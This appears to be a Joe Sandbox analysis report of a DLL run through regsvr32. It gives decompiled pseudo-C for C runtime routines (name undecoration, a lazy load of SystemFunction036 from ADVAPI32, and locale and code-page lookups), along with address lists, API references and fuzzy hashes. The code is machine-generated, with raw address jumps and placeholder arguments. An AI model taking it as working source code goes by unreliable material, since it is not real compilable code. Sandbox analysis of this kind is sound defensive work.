				 *(__rcx + 8) =  *(__rcx + 8) & 0xffff00ff;
				 *__rcx = __rbx;
				 *(__rcx + 8) = 2;
				goto 0x2b06ef7d;
				r12d = 1;
				_t172 = _t171 | 0xffffffff;
				_t226 = _t225 + _t309;
				 *0x2b0c9a70 = _t226;
				if ( *_t225 - 0x36 != 0x29) goto 0x2b06eb77;
				if ( *_t226 == 0) goto 0x2b06eb6f;
				_t189 =  *_t226 - 0x3d;
				 *0x2b0c9a70 = _t226 + _t309;
				if (_t189 - 4 < 0) goto 0x2b06eb80;
				goto 0x2b06eb7e;
				goto 0x2b06eaf1;
				if (_t189 < 0) goto 0x2b06eb80;
				if (_t189 - 3 <= 0) goto 0x2b06eb82;
				_t190 = _t172;
				_t201 = _t190 - _t172;
				if (_t201 != 0) goto 0x2b06eb99;
				 *(__rcx + 8) =  *(__rcx + 8) & 0xffff00ff;
				 *__rcx = __rbx;
				 *(__rcx + 8) = 2;
				goto 0x2b06ef7d;
				r13d =  *(_t297 - 0x11);
				asm("movups xmm0, [edx]");
				r15d = _t190;
				r13d = r13d & 0xffff0000;
				r15d = r15d & 0x00000002;
				 *((long long*)(_t297 - 0x19)) = __rbx;
				 *(_t297 - 0x11) = r13d;
				asm("movdqu [ebp-0x29], xmm0");
				if (_t201 == 0) goto 0x2b06ecd1;
				E00007FFD7FFD2B06A9E0(_t297 + 0x17, "::");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x7], xmm0");
				E00007FFD7FFD2B06AC78(_t226 + _t309, _t297 + 7, _t297 - 0x29);
				_t228 =  *0x2b0c9a70; // 0x0
				asm("movaps xmm5, [ebp+0x7]");
				asm("movdqa [ebp-0x29], xmm5");
				if ( *_t228 == 0) goto 0x2b06ec3f;
				E00007FFD7FFD2B06E6CC(r12d, _t190, __rbx, _t297 + 0x17, _t290, __rsi, __r8, __r10, __r11);
				_t233 = _t228;
				E00007FFD7FFD2B06A9A8(0x20, _t228, _t297 - 9);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x7], xmm0");
				E00007FFD7FFD2B06AC78(_t228, _t297 + 7, _t233);
				asm("movaps xmm5, [ebp+0x7]");
				asm("movdqa [ebp+0x7], xmm5");
				E00007FFD7FFD2B06AC78(_t228, _t297 + 7, _t297 - 0x29);
				goto 0x2b06ec5c;
				E00007FFD7FFD2B06A490(r12d, _t228, _t297 + 7);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x7], xmm0");
				E00007FFD7FFD2B06AC78(_t228, _t297 + 7, _t297 - 0x29);
				_t229 =  *0x2b0c9a70; // 0x0
				asm("movaps xmm5, [ebp+0x7]");
				asm("movdqa [ebp-0x29], xmm5");
				if ( *_t229 == 0) goto 0x2b06edb3;
				if ( *_t229 != 0x40) goto 0x2b06eb86;
				_t230 = _t229 + _t309;
				 *((long long*)(_t297 - 9)) = _t233;
				 *((long long*)(_t297 + 7)) = _t233;
				 *0x2b0c9a70 = _t230;
				_t117 =  *0x2b0c9a8c; // 0x0
				 *((intOrPtr*)(_t299 - 0x90 + 0x20)) = r12d;
				if ((_t117 & 0x00000060) == 0x60) goto 0x2b06ed76;
				 *(_t297 - 1) =  *(_t297 - 1) & 0xffff0000;
				 *(_t297 + 0xf) =  *(_t297 + 0xf) & 0xffff0000;
				E00007FFD7FFD2B06EFA4(_t233, _t297 + 0x17, _t297 + 7, _t292, 0x2b08398d, _t297 - 9, __r10, __r11);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp-0x19], xmm5");
				if ((sil & 0x00000004) == 0) goto 0x2b06ed34;
				_t121 =  *0x2b0c9a8c; // 0x0
				if ((r12b &  !(_t121 >> 1)) == 0) goto 0x2b06edc8;
				E00007FFD7FFD2B06D634(_t172, r12d, _t190, _t230, _t297 + 7, _t290, _t292, 0x2b08398d, __r10, __r11);
				E00007FFD7FFD2B06A9A8(0x20, _t230, _t297 - 9);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x17], xmm0");
				E00007FFD7FFD2B06AC78(_t230, _t297 + 0x17, _t230);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp+0x17], xmm5");
				E00007FFD7FFD2B06AC78(_t230, _t297 + 0x17, _t297 - 0x29);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp-0x29], xmm5");
				_t128 =  *0x2b0c9a8c; // 0x0
				if ((r12b &  !(_t128 >> 1)) == 0) goto 0x2b06edfb;
				E00007FFD7FFD2B06ADBC(_t297 + 7);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x17], xmm0");
				_t132 = E00007FFD7FFD2B06AC78(_t230, _t297 + 0x17, _t297 - 0x29);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp-0x29], xmm5");
				goto 0x2b06ee1e;
				 *(_t297 + 0xf) =  *(_t297 + 0xf) & _t132;
				 *(_t297 - 1) =  *(_t297 - 1) & _t132;
				E00007FFD7FFD2B06EFA4(_t230, _t297 + 0x17, _t297 - 9, _t292, 0x2b08398d, _t297 + 7, __r10, __r11);
				if ( *(_t297 - 0x11) == 3) goto 0x2b06ecd1;
				if ( *(_t297 + 0x1f) - r12b <= 0) goto 0x2b06ecd1;
				r13d = r13d ^ ( *(_t297 + 0x1f) ^ r13d) & 0x000000ff;
				 *(_t297 - 0x11) = r13d;
				goto 0x2b06ecd1;
				E00007FFD7FFD2B06A490(r12d, _t230, _t297 + 0x17);
				goto 0x2b06eafd;
				E00007FFD7FFD2B06D634(_t172, r12d, _t190, _t230, _t297 + 0x17, _t290, _t292, 0x2b08398d, __r10, __r11);
				if ( *(_t297 - 0x21) == 3) goto 0x2b06ed34;
				if ( *(_t230 + 8) - r12b <= 0) goto 0x2b06ed34;
				_t169 =  *(_t297 - 0x21) ^ ( *(_t230 + 8) ^  *(_t297 - 0x21)) & 0x000000ff;
				 *(_t297 - 0x21) = _t169;
				goto 0x2b06ed37;
				E00007FFD7FFD2B06ADBC(_t297 + 0x17);
				if ( *(_t297 - 0x21) == 3) goto 0x2b06ee1e;
				if ( *(_t230 + 8) - r12b <= 0) goto 0x2b06ee1e;
				 *(_t297 - 0x21) = _t169 ^ ( *(_t230 + 8) ^ _t169) & 0x000000ff;
				r13d = 0;
				if ( *_t314 == _t311) goto 0x2b06ee63;
				E00007FFD7FFD2B06A9A8(0x28, _t230, _t297 + 7);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x17], xmm0");
				E00007FFD7FFD2B06AC78(_t230, _t297 + 0x17, _t297 - 0x29);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp+0x17], xmm5");
				E00007FFD7FFD2B06AF5C(0x29, _t190, _t230, _t230, _t297 + 0x17, _t292, 0x2b08398d, _t316);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp-0x29], xmm5");
				r8d = 0;
				E00007FFD7FFD2B069E00(_t230, 0x2b0c9a38, _t297 - 0x29, _t292, _t313);
				if (_t230 == 0) goto 0x2b06ee8e;
				 *(_t230 + 8) = r13b;
				 *(_t230 + 8) =  *(_t230 + 8) & 0xffff00ff;
				 *_t230 = _t311;
				goto 0x2b06ee91;
				_t294 = _t311;
				E00007FFD7FFD2B06A838(_t297 + 0x27);
				E00007FFD7FFD2B06B594(0x7ffd2b08399d, _t190, _t297 + 7, _t294, _t294, 0x2b08398d, __r11);
				E00007FFD7FFD2B06A9A8(0x28, _t230, _t297 - 9);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp+0x17], xmm0");
				E00007FFD7FFD2B06AC78(_t230, _t297 + 0x17, _t230);
				asm("movaps xmm5, [ebp+0x17]");
				asm("movdqa [ebp+0x17], xmm5");
				E00007FFD7FFD2B06AF5C(0x29, _t190, _t230, _t230, _t297 + 0x17, _t294, 0x2b08398d, _t311);
				E00007FFD7FFD2B06AC78(_t230, _t297 - 0x29, _t297 + 0x17);
				r11d =  *0x2b0c9a8c; // 0x0
				if ((r11d & 0x00000060) == 0x60) goto 0x2b06ef13;
				if (r15d == 0) goto 0x2b06ef13;
				E00007FFD7FFD2B06AC78(_t230, _t297 - 0x29, _t297 - 0x19);
				r11d =  *0x2b0c9a8c; // 0x0
				r11d = r11d >> 8;
				r11d =  !r11d;
				if ((r12b & r11b) == 0) goto 0x2b06ef36;
				E00007FFD7FFD2B06B69C(0x29, _t190, _t230, _t297 + 0x17, _t297 - 0x19, _t290, _t294, 0x2b08398d, _t307, _t309, _t296);
				E00007FFD7FFD2B06AC78(_t230, _t297 - 0x29, _t230);
				goto 0x2b06ef58;
				E00007FFD7FFD2B06B69C(0x29, _t190, _t230, _t297 - 0x29, _t230, _t290, _t294, 0x2b08398d, _t307);
				if ( *(_t297 - 0x21) == 3) goto 0x2b06ef58;
				if ( *(_t230 + 8) - r12b <= 0) goto 0x2b06ef58;
				_t173 =  *(_t297 - 0x21);
				_t164 = ( *(_t230 + 8) ^ _t173) & 0x000000ff;
				 *(_t297 - 0x21) = _t173 ^ _t164;
				if (_t294 == 0) goto 0x2b06ef6f;
				asm("movaps xmm0, [ebp-0x29]");
				asm("movdqu [esi], xmm0");
				asm("movups xmm1, [ebp+0x27]");
				asm("movdqu [edi], xmm1");
				goto 0x2b06ef7d;
				 *(_t290 + 8) =  *(_t290 + 8) & 0xffff00ff;
				 *_t290 = _t311;
				 *(_t290 + 8) = 3;
				return _t164;
			}

0x7ffd2b06eab8
0x7ffd2b06eab8
0x7ffd2b06eab8
0x7ffd2b06eab8
0x7ffd2b06eab8
0x7ffd2b06eabb
0x7ffd2b06eabf
0x7ffd2b06eac3
0x7ffd2b06ead0
0x7ffd2b06eadb
0x7ffd2b06eae4
0x7ffd2b06eae7
0x7ffd2b06eaec
0x7ffd2b06eaee
0x7ffd2b06eaf5
0x7ffd2b06eafd
0x7ffd2b06eb03
0x7ffd2b06eb07
0x7ffd2b06eb0c
0x7ffd2b06eb14
0x7ffd2b06eb19
0x7ffd2b06eb1e
0x7ffd2b06eb20
0x7ffd2b06eb27
0x7ffd2b06eb2a
0x7ffd2b06eb2e
0x7ffd2b06eb36
0x7ffd2b06eb3c
0x7ffd2b06eb3f
0x7ffd2b06eb45
0x7ffd2b06eb4f
0x7ffd2b06eb53
0x7ffd2b06eb5b
0x7ffd2b06eb5e
0x7ffd2b06eb68
0x7ffd2b06eb6d
0x7ffd2b06eb72
0x7ffd2b06eb79
0x7ffd2b06eb7e
0x7ffd2b06eb80
0x7ffd2b06eb82
0x7ffd2b06eb84
0x7ffd2b06eb86
0x7ffd2b06eb8d
0x7ffd2b06eb90
0x7ffd2b06eb94
0x7ffd2b06eb99
0x7ffd2b06eb9d
0x7ffd2b06eba0
0x7ffd2b06eba3
0x7ffd2b06ebaa
0x7ffd2b06ebae
0x7ffd2b06ebb2
0x7ffd2b06ebb6
0x7ffd2b06ebbb
0x7ffd2b06ebcc
0x7ffd2b06ebd9
0x7ffd2b06ebdc
0x7ffd2b06ebe1
0x7ffd2b06ebe6
0x7ffd2b06ebed
0x7ffd2b06ebf5
0x7ffd2b06ebfc
0x7ffd2b06ebfe
0x7ffd2b06ec09
0x7ffd2b06ec0c
0x7ffd2b06ec18
0x7ffd2b06ec1b
0x7ffd2b06ec20
0x7ffd2b06ec25
0x7ffd2b06ec31
0x7ffd2b06ec36
0x7ffd2b06ec3d
0x7ffd2b06ec42
0x7ffd2b06ec4f
0x7ffd2b06ec52
0x7ffd2b06ec57
0x7ffd2b06ec5c
0x7ffd2b06ec63
0x7ffd2b06ec67
0x7ffd2b06ec6e
0x7ffd2b06ec77
0x7ffd2b06ec7d
0x7ffd2b06ec80
0x7ffd2b06ec84
0x7ffd2b06ec88
0x7ffd2b06ec8f
0x7ffd2b06ec95
0x7ffd2b06ecaf
0x7ffd2b06ecb5
0x7ffd2b06ecb8
0x7ffd2b06ecc3
0x7ffd2b06ecc8
0x7ffd2b06eccc
0x7ffd2b06ecd5
0x7ffd2b06ecd7
0x7ffd2b06ece4
0x7ffd2b06ecee
0x7ffd2b06ecfc
0x7ffd2b06ed08
0x7ffd2b06ed0b
0x7ffd2b06ed10
0x7ffd2b06ed15
0x7ffd2b06ed21
0x7ffd2b06ed26
0x7ffd2b06ed2b
0x7ffd2b06ed2f
0x7ffd2b06ed37
0x7ffd2b06ed44
0x7ffd2b06ed4e
0x7ffd2b06ed5b
0x7ffd2b06ed5e
0x7ffd2b06ed63
0x7ffd2b06ed68
0x7ffd2b06ed6c
0x7ffd2b06ed71
0x7ffd2b06ed76
0x7ffd2b06ed79
0x7ffd2b06ed84
0x7ffd2b06ed8d
0x7ffd2b06ed97
0x7ffd2b06eda7
0x7ffd2b06edaa
0x7ffd2b06edae
0x7ffd2b06edba
0x7ffd2b06edc3
0x7ffd2b06edcc
0x7ffd2b06edd5
0x7ffd2b06eddf
0x7ffd2b06edf1
0x7ffd2b06edf3
0x7ffd2b06edf6
0x7ffd2b06edff
0x7ffd2b06ee08
0x7ffd2b06ee0e
0x7ffd2b06ee1b
0x7ffd2b06ee1e
0x7ffd2b06ee24
0x7ffd2b06ee2c
0x7ffd2b06ee39
0x7ffd2b06ee3c
0x7ffd2b06ee41
0x7ffd2b06ee46
0x7ffd2b06ee50
0x7ffd2b06ee55
0x7ffd2b06ee5a
0x7ffd2b06ee5e
0x7ffd2b06ee63
0x7ffd2b06ee71
0x7ffd2b06ee7c
0x7ffd2b06ee7e
0x7ffd2b06ee82
0x7ffd2b06ee89
0x7ffd2b06ee8c
0x7ffd2b06ee8e
0x7ffd2b06ee98
0x7ffd2b06eea1
0x7ffd2b06eeaf
0x7ffd2b06eebb
0x7ffd2b06eebe
0x7ffd2b06eec3
0x7ffd2b06eec8
0x7ffd2b06eed2
0x7ffd2b06eed7
0x7ffd2b06eee4
0x7ffd2b06eee9
0x7ffd2b06eef8
0x7ffd2b06eefd
0x7ffd2b06ef07
0x7ffd2b06ef0c
0x7ffd2b06ef13
0x7ffd2b06ef1b
0x7ffd2b06ef21
0x7ffd2b06ef23
0x7ffd2b06ef2f
0x7ffd2b06ef34
0x7ffd2b06ef36
0x7ffd2b06ef3f
0x7ffd2b06ef45
0x7ffd2b06ef47
0x7ffd2b06ef50
0x7ffd2b06ef55
0x7ffd2b06ef5b
0x7ffd2b06ef5d
0x7ffd2b06ef61
0x7ffd2b06ef65
0x7ffd2b06ef69
0x7ffd2b06ef6d
0x7ffd2b06ef6f
0x7ffd2b06ef76
0x7ffd2b06ef79
0x7ffd2b06efa0

APIs

Part of subcall function 00007FFD2B06A490: DNameStatusNode::make.LIBCMT ref: 00007FFD2B06A4C0

DName::operator+=.LIBCMT ref: 00007FFD2B06EB07

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: NameName::operator+=Node::makeStatus
String ID:
API String ID: 2733247609-0
Opcode ID: eb2993ff47c26f89a8bab52ca479db4366fc946142bc3caa6fa039aaa28782f7
Instruction ID: 91a2930f27cd9ee8ed8dc82c56fa0be7fa8140d7a7d26e9b2849f82ed810370e
Opcode Fuzzy Hash: eb2993ff47c26f89a8bab52ca479db4366fc946142bc3caa6fa039aaa28782f7
Instruction Fuzzy Hash: 06F1F463F09B869DF702DF34C9620FC3360EB5A748B408131DA4D16AA6DFB8E595D390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B072AF0 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00007FFD7FFD2B072AF0(intOrPtr __rax, long long __rbx, signed int* __rcx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				__imp__DecodePointer();
				if (__rcx != 0) goto 0x2b072b34;
				E00007FFD7FFD2B067698(__rax);
				 *((intOrPtr*)(__rax)) = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b072bdf;
				 *__rcx =  *__rcx & 0x00000000;
				if (__rax != 0) goto 0x2b072bbb;
				LoadLibraryW(??);
				if (__rax == 0) goto 0x2b072b1c;
				GetProcAddress(??, ??);
				if (__rax != 0) goto 0x2b072b95;
				E00007FFD7FFD2B067698(__rax);
				 *((intOrPtr*)(__rax)) = E00007FFD7FFD2B067650(GetLastError(), __rax, __rax, __r8);
				E00007FFD7FFD2B069444();
				E00007FFD7FFD2B067650(GetLastError(), __rax, __rax, __r8);
				goto 0x2b072bdf;
				__imp__EncodePointer();
				E00007FFD7FFD2B067DD0();
				 *0x2b0c9b40 = __rax;
				if ( *0x2b0c9b40 == __rax) goto 0x2b072bbb;
				FreeLibrary(??);
				if ( *((long long*)(__rax))() != 0) goto 0x2b072bdd;
				E00007FFD7FFD2B067698(__rax);
				 *((intOrPtr*)(__rax)) = 0xc;
				E00007FFD7FFD2B067698(__rax);
				goto 0x2b072bdf;
				return 0;
			}

0x7ffd2b072af0
0x7ffd2b072af5
0x7ffd2b072afa
0x7ffd2b072b0e
0x7ffd2b072b1a
0x7ffd2b072b1c
0x7ffd2b072b26
0x7ffd2b072b28
0x7ffd2b072b2f
0x7ffd2b072b34
0x7ffd2b072b3b
0x7ffd2b072b44
0x7ffd2b072b50
0x7ffd2b072b5c
0x7ffd2b072b68
0x7ffd2b072b6a
0x7ffd2b072b7f
0x7ffd2b072b81
0x7ffd2b072b8e
0x7ffd2b072b93
0x7ffd2b072b98
0x7ffd2b072ba1
0x7ffd2b072ba6
0x7ffd2b072bb0
0x7ffd2b072bb5
0x7ffd2b072bc7
0x7ffd2b072bc9
0x7ffd2b072bce
0x7ffd2b072bd4
0x7ffd2b072bdb
0x7ffd2b072bf3

APIs

DecodePointer.KERNEL32 ref: 00007FFD2B072B0E
_errno.LIBCMT ref: 00007FFD2B072B1C
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B072B28
LoadLibraryW.KERNEL32 ref: 00007FFD2B072B44
GetProcAddress.KERNEL32 ref: 00007FFD2B072B5C
_errno.LIBCMT ref: 00007FFD2B072B6A
GetLastError.KERNEL32 ref: 00007FFD2B072B72
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B072B81
GetLastError.KERNEL32 ref: 00007FFD2B072B86

Strings

SystemFunction036, xrefs: 00007FFD2B072B52
ADVAPI32.DLL, xrefs: 00007FFD2B072B3D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ErrorLast_errno_invalid_parameter_noinfo$AddressDecodeLibraryLoadPointerProc
String ID: ADVAPI32.DLL$SystemFunction036
API String ID: 3960458323-1064046199
Opcode ID: 6baebd96d8677e0e2626ab8518790aef827a3d94af0f00b89ed85f44c4863fc0
Instruction ID: 8909fda45d6981925ab8f20e02f29fc391909bf5e293ffe900abb93f52f68bcb
Opcode Fuzzy Hash: 6baebd96d8677e0e2626ab8518790aef827a3d94af0f00b89ed85f44c4863fc0
Instruction Fuzzy Hash: AA212320F0BA4389FA03AF21AE651786290EF5BB84F544434EA4D07376DEBCE940B780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077FCC Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00007FFD7FFD2B077FCC(void* __ecx, void* __eflags, void* __rax, long long __rbx, intOrPtr __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* _t56;
				int _t59;
				short _t100;
				signed int _t117;
				void* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t140;
				signed long long _t141;
				intOrPtr* _t143;
				char* _t152;
				int _t162;
				int _t165;
				intOrPtr _t166;
				long long _t169;
				intOrPtr* _t170;
				void* _t172;
				void* _t173;
				void* _t183;
				_Unknown_base(*)()* _t184;
				void* _t185;

				_t183 = __r9;
				_t136 = __rax;
				 *((long long*)(_t172 + 0x10)) = __rbx;
				 *((long long*)(_t172 + 0x18)) = _t169;
				_t173 = _t172 - 0x30;
				_t185 = __r8;
				_t170 = __rdx;
				_t166 = __rcx;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, __rcx, __r8);
				_t3 = _t136 + 0x140; // 0x140
				_t143 = _t3;
				if (__rcx != 0) goto 0x2b078004;
				 *(_t143 + 0x10) =  *(_t143 + 0x10) | 0x00000104;
				goto 0x2b0780e7;
				_t6 = _t166 + 0x40; // 0xf9
				_t137 = _t6;
				 *_t143 = __rcx;
				 *((long long*)(_t143 + 8)) = _t137;
				if (_t137 == 0) goto 0x2b07802e;
				if ( *_t137 == 0) goto 0x2b07802e;
				_t8 = _t143 + 8; // 0x148
				E00007FFD7FFD2B077730(0x16, _t143, 0x2b085a40, _t162, __rcx, _t8);
				_t138 =  *_t143;
				 *(_t143 + 0x10) =  *(_t143 + 0x10) & 0x00000000;
				if (_t138 == 0) goto 0x2b0780a3;
				if ( *_t138 == 0) goto 0x2b0780a3;
				_t139 =  *((intOrPtr*)(_t143 + 8));
				if (_t139 == 0) goto 0x2b078057;
				if ( *_t139 == 0) goto 0x2b078057;
				E00007FFD7FFD2B077EC8(_t139, _t143);
				goto 0x2b07805f;
				E00007FFD7FFD2B077F60(_t139, _t143);
				if ( *(_t143 + 0x10) != 0) goto 0x2b0780fd;
				if (E00007FFD7FFD2B077730(0x40, _t143, 0x2b085630, _t162, _t166, _t143) == 0) goto 0x2b0780f3;
				_t140 =  *((intOrPtr*)(_t143 + 8));
				if (_t140 == 0) goto 0x2b078099;
				if ( *_t140 == 0) goto 0x2b078099;
				E00007FFD7FFD2B077EC8(_t140, _t143);
				goto 0x2b0780f3;
				_t56 = E00007FFD7FFD2B077F60(_t140, _t143);
				goto 0x2b0780f3;
				_t152 =  *((intOrPtr*)(_t143 + 8));
				if (_t152 == 0) goto 0x2b0780e0;
				if ( *_t152 == 0) goto 0x2b0780e0;
				E00007FFD7FFD2B0653B0(_t56, _t152);
				 *(_t143 + 0x1c) = 0 | _t140 == 0x00000003;
				EnumSystemLocalesA(_t184);
				if (( *(_t143 + 0x10) & 0x00000004) != 0) goto 0x2b0780f3;
				 *(_t143 + 0x10) =  *(_t143 + 0x10) & 0x00000000;
				goto 0x2b0780f3;
				 *(_t143 + 0x10) = 0x104;
				_t59 = GetUserDefaultLCID();
				 *(_t143 + 0x20) = _t59;
				 *(_t143 + 0x24) = _t59;
				_t117 =  *(_t143 + 0x10);
				if (_t117 == 0) goto 0x2b078294;
				_t28 = _t166 + 0x80; // 0x139
				_t141 = _t28;
				asm("dec eax");
				if (_t117 == 0) goto 0x2b078169;
				if ( *(_t162 & _t141) == 0) goto 0x2b078169;
				if (E00007FFD7FFD2B0657E0(_t140 == 3, _t162 & _t141, 0x2b085bc8) == 0) goto 0x2b078169;
				if (E00007FFD7FFD2B0657E0(_t140 == 3, _t162 & _t141, 0x2b085bc4) != 0) goto 0x2b07815f;
				_t30 = _t141 + 2; // 0x2
				r9d = _t30;
				if (GetLocaleInfoW(_t162, _t165) == 0) goto 0x2b078294;
				goto 0x2b07819a;
				E00007FFD7FFD2B0750DC(_t62, 0x2b085bc4);
				goto 0x2b078198;
				r9d = 2;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x2b078294;
				if ( *((intOrPtr*)(_t173 + 0x50)) != 0) goto 0x2b0781a2;
				_t100 = GetACP();
				if (_t100 == 0) goto 0x2b078294;
				if (_t100 == 0xfde8) goto 0x2b078294;
				if (_t100 == 0xfde9) goto 0x2b078294;
				if (IsValidCodePage(??) == 0) goto 0x2b078294;
				if (IsValidLocale(??, ??) == 0) goto 0x2b078294;
				if (_t170 == 0) goto 0x2b0781fa;
				 *_t170 =  *(_t143 + 0x20) & 0x0000ffff;
				 *((short*)(_t170 + 4)) = _t100;
				 *((short*)(_t170 + 2)) =  *(_t143 + 0x24) & 0x0000ffff;
				if (_t185 == 0) goto 0x2b07828d;
				if ( *_t170 != 0x814) goto 0x2b07823c;
				if (E00007FFD7FFD2B066870(_t141, _t185, 0x2b085bc4, "Norwegian-Nynorsk") == 0) goto 0x2b078257;
				 *(_t173 + 0x20) =  *(_t173 + 0x20) & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				r9d = 0x40;
				if (GetLocaleInfoA(??, ??, ??, ??) == 0) goto 0x2b078294;
				r9d = 0x40;
				if (GetLocaleInfoA(??, ??, ??, ??) == 0) goto 0x2b078294;
				r9d = 0xa;
				_t47 = _t183 + 6; // 0x6
				r8d = _t47;
				E00007FFD7FFD2B07A64C(_t100);
				goto 0x2b078296;
				return 0;
			}

0x7ffd2b077fcc
0x7ffd2b077fcc
0x7ffd2b077fcc
0x7ffd2b077fd1
0x7ffd2b077fda
0x7ffd2b077fde
0x7ffd2b077fe1
0x7ffd2b077fe4
0x7ffd2b077fe7
0x7ffd2b077fec
0x7ffd2b077fec
0x7ffd2b077ff6
0x7ffd2b077ff8
0x7ffd2b077fff
0x7ffd2b078004
0x7ffd2b078004
0x7ffd2b078008
0x7ffd2b07800b
0x7ffd2b078012
0x7ffd2b078017
0x7ffd2b078019
0x7ffd2b078029
0x7ffd2b07802e
0x7ffd2b078031
0x7ffd2b078038
0x7ffd2b07803d
0x7ffd2b07803f
0x7ffd2b078046
0x7ffd2b07804b
0x7ffd2b078050
0x7ffd2b078055
0x7ffd2b07805a
0x7ffd2b078063
0x7ffd2b07807f
0x7ffd2b078081
0x7ffd2b078088
0x7ffd2b07808d
0x7ffd2b078092
0x7ffd2b078097
0x7ffd2b07809c
0x7ffd2b0780a1
0x7ffd2b0780a3
0x7ffd2b0780aa
0x7ffd2b0780af
0x7ffd2b0780b1
0x7ffd2b0780c4
0x7ffd2b0780ce
0x7ffd2b0780d8
0x7ffd2b0780da
0x7ffd2b0780de
0x7ffd2b0780e0
0x7ffd2b0780e7
0x7ffd2b0780ed
0x7ffd2b0780f0
0x7ffd2b0780f3
0x7ffd2b0780f7
0x7ffd2b0780fd
0x7ffd2b0780fd
0x7ffd2b078107
0x7ffd2b07810d
0x7ffd2b078112
0x7ffd2b078125
0x7ffd2b078138
0x7ffd2b07813d
0x7ffd2b07813d
0x7ffd2b078153
0x7ffd2b07815d
0x7ffd2b078162
0x7ffd2b078167
0x7ffd2b078171
0x7ffd2b078184
0x7ffd2b078190
0x7ffd2b078198
0x7ffd2b07819c
0x7ffd2b0781a8
0x7ffd2b0781b4
0x7ffd2b0781c5
0x7ffd2b0781db
0x7ffd2b0781e4
0x7ffd2b0781ea
0x7ffd2b0781f2
0x7ffd2b0781f6
0x7ffd2b0781fd
0x7ffd2b07820c
0x7ffd2b078224
0x7ffd2b078226
0x7ffd2b07822c
0x7ffd2b07822f
0x7ffd2b078236
0x7ffd2b07823b
0x7ffd2b07823f
0x7ffd2b078255
0x7ffd2b078264
0x7ffd2b078272
0x7ffd2b078274
0x7ffd2b078284
0x7ffd2b078284
0x7ffd2b078288
0x7ffd2b078292
0x7ffd2b0782a8

APIs

_getptd.LIBCMT ref: 00007FFD2B077FE7

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

GetUserDefaultLCID.KERNEL32 ref: 00007FFD2B0780E7
GetLocaleInfoW.KERNEL32 ref: 00007FFD2B07814B
IsValidCodePage.KERNEL32 ref: 00007FFD2B0781BD
IsValidLocale.KERNEL32 ref: 00007FFD2B0781D3
GetLocaleInfoA.KERNEL32 ref: 00007FFD2B07824D
GetLocaleInfoA.KERNEL32 ref: 00007FFD2B07826A
_itow_s.LIBCMT ref: 00007FFD2B078288

Part of subcall function 00007FFD2B06938C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFD2B069442), ref: 00007FFD2B0693A4

Strings

OCP, xrefs: 00007FFD2B078127
ACP, xrefs: 00007FFD2B078114
Norwegian-Nynorsk, xrefs: 00007FFD2B07820E

Memory Dump Source

